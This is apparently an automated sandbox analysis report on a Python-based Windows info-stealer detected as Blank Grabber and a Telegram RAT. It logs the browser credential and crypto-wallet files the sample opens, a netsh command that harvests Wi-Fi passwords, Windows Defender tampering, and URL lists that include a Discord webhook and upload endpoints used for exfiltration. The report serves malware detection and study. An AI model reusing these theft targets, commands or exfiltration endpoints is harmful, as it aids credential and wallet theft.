              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ereum\keystore
              Tries to harvest and steal WLAN passwords
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\c7615543-0de7-4eea-9862-59688b7f430dJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7656, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000002.00000003.1760965599.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1762531034.00000161970DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1757718097.000001619762A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1329466434.00000162E122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1759071926.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1765429469.00000161970E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1329466434.00000162E1229000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7600, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7656, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI76002\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7656, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		4
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts1
              Native API              		2
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		11
              Deobfuscate/Decode Files or Information              		LSASS Memory3
              File and Directory Discovery              		Remote Desktop Protocol3
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts112
              Command and Scripting Interpreter              		Logon Script (Windows)11
              Process Injection              		21
              Obfuscated Files or Information              		Security Account Manager47
              System Information Discovery              		SMB/Windows Admin Shares1
              Clipboard Data              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell              		Login Hook2
              Registry Run Keys / Startup Folder              		11
              Software Packing              		NTDS151
              Security Software Discovery              		Distributed Component Object ModelInput Capture5
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets2
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
              Virtualization/Sandbox Evasion              		Cached Domain Credentials141
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Process Injection              		Proc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446241 Sample: SecuriteInfo.com.Python.Mul... Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 67 discord.com 2->67 69 ip-api.com 2->69 83 Found malware configuration 2->83 85 Antivirus detection for URL or domain 2->85 87 Antivirus / Scanner detection for submitted sample 2->87 89 13 other signatures 2->89 11 SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe 22 2->11         started        signatures3 process4 file5 55 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->55 dropped 57 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->57 dropped 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->59 dropped 61 16 other files (none is malicious) 11->61 dropped 107 Very long command line found 11->107 109 Modifies Windows Defender protection settings 11->109 111 Adds a directory exclusion to Windows Defender 11->111 113 2 other signatures 11->113 15 SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe 1 109 11->15         started        signatures6 process7 dnsIp8 71 discord.com 162.159.135.232, 443, 49715 CLOUDFLARENETUS United States 15->71 73 ip-api.com 208.95.112.1, 49714, 80 TUT-ASUS United States 15->73 75 Very long command line found 15->75 77 Found many strings related to Crypto-Wallets (likely being stolen) 15->77 79 Tries to harvest and steal browser information (history, passwords, etc) 15->79 81 6 other signatures 15->81 19 cmd.exe 1 15->19         started        22 cmd.exe 1 15->22         started        24 cmd.exe 15->24         started        26 24 other processes 15->26 signatures9 process10 signatures11 91 Suspicious powershell command line found 19->91 93 Very long command line found 19->93 95 Encrypted powershell cmdline option found 19->95 105 2 other signatures 19->105 28 powershell.exe 23 19->28         started        31 conhost.exe 19->31         started        97 Modifies Windows Defender protection settings 22->97 99 Removes signatures from Windows Defender 22->99 33 powershell.exe 23 22->33         started        41 2 other processes 22->41 43 2 other processes 24->43 101 Adds a directory exclusion to Windows Defender 26->101 103 Tries to harvest and steal WLAN passwords 26->103 35 getmac.exe 26->35         started        37 powershell.exe 26->37         started        39 systeminfo.exe 26->39         started        46 45 other processes 26->46 process12 file13 115 Loading BitLocker PowerShell Module 33->115 117 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 35->117 119 Writes or reads registry keys via WMI 35->119 63 C:\Users\user\AppData\...\c3m2uwl3.cmdline, Unicode 43->63 dropped 48 csc.exe 43->48         started        65 C:\Users\user\AppData\Local\Temp\R9FJX.zip, RAR 46->65 dropped signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\c3m2uwl3.dll, PE32 48->53 dropped 51 cvtres.exe 48->51         started        process17

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe58%ReversingLabsWin64.Trojan.Lazy
              SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe100%AviraHEUR/AGEN.1351111
              SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI76002\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\libcrypto-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\libssl-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\python311.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI76002\unicodedata.pyd0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://www.avito.ru/0%URL Reputationsafe
              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
              http://crl.microsoft0%URL Reputationsafe
              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
              https://www.leboncoin.fr/0%URL Reputationsafe
              https://tools.ietf.org/html/rfc2388#section-4.40%URL Reputationsafe
              https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base640%URL Reputationsafe
              https://weibo.com/0%URL Reputationsafe
              https://www.msn.com0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              http://cacerts.digi0%URL Reputationsafe
              https://peps.python.org/pep-0205/0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://www.amazon.ca/0%URL Reputationsafe
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
              https://www.ebay.de/0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://www.amazon.com/0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://httpbin.org/0%URL Reputationsafe
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
              http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://allegro.pl/0%URL Reputationsafe
              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5350%URL Reputationsafe
              https://MD8.mozilla.org/1/m0%URL Reputationsafe
              https://www.python.org/psf/license/0%URL Reputationsafe
              https://bugzilla.mo0%URL Reputationsafe
              http://tools.ietf.org/html/rfc6125#section-6.4.30%URL Reputationsafe
              http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
              http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm0%URL Reputationsafe
              https://foss.heptapod.net/pypy/pypy/-/issues/35390%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              https://www.python.org/download/releases/2.3/mro/.0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%Avira URL Cloudsafe
              https://api.anonfiles.com/upload0%Avira URL Cloudsafe
              https://github.com/urllib3/urllib3/issues/2192#issuecomment-8218329630%Avira URL Cloudsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
              https://discord.com/api/v9/users/0%Avira URL Cloudsafe
              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
              https://github.com/Blank-c/BlankOBF0%Avira URL Cloudsafe
              https://yahoo.com/0%URL Reputationsafe
              https://account.bellmedia.c0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-60%URL Reputationsafe
              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
              http://logo.verisM0%Avira URL Cloudsafe
              http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
              https://html.spec.whatwg.org/multipage/0%URL Reputationsafe
              https://www.ifeng.com/0%URL Reputationsafe
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings0%URL Reputationsafe
              https://api.telegram.org/bot0%Avira URL Cloudsafe
              http://www.microsoft.co0%Avira URL Cloudsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://oneget.orgX0%URL Reputationsafe
              http://www.iana.org/time-zones/repository/tz-link.html0%URL Reputationsafe
              https://api.gofile.io/getServer0%URL Reputationsafe
              http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              https://www.amazon.co.uk/0%URL Reputationsafe
              http://ocsp.thawte.com00%URL Reputationsafe
              https://json.org0%URL Reputationsafe
              https://www.wykop.pl/0%URL Reputationsafe
              https://twitter.com/0%URL Reputationsafe
              https://www.olx.pl/0%URL Reputationsafe
              https://support.mozilla.org/products/firefox0%URL Reputationsafe
              https://discord.com/api/webhooks/1220929699618750534/zhSTomvYGhmMHwb8qcNrPuGLmzvJ7OZ0dj098Ewa_79bqm50%Avira URL Cloudsafe
              https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L6880%Avira URL Cloudsafe
              https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY50%Avira URL Cloudsafe
              https://www.reddit.com/0%Avira URL Cloudsafe
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy0%Avira URL Cloudsafe
              http://www.microsoftISPLA~1.PNGy./0%Avira URL Cloudsafe
              http://ocsp.sectigo.com0$0%Avira URL Cloudsafe
              https://www.bbc.co.uk/0%Avira URL Cloudsafe
              https://google.com/mail0%Avira URL Cloudsafe
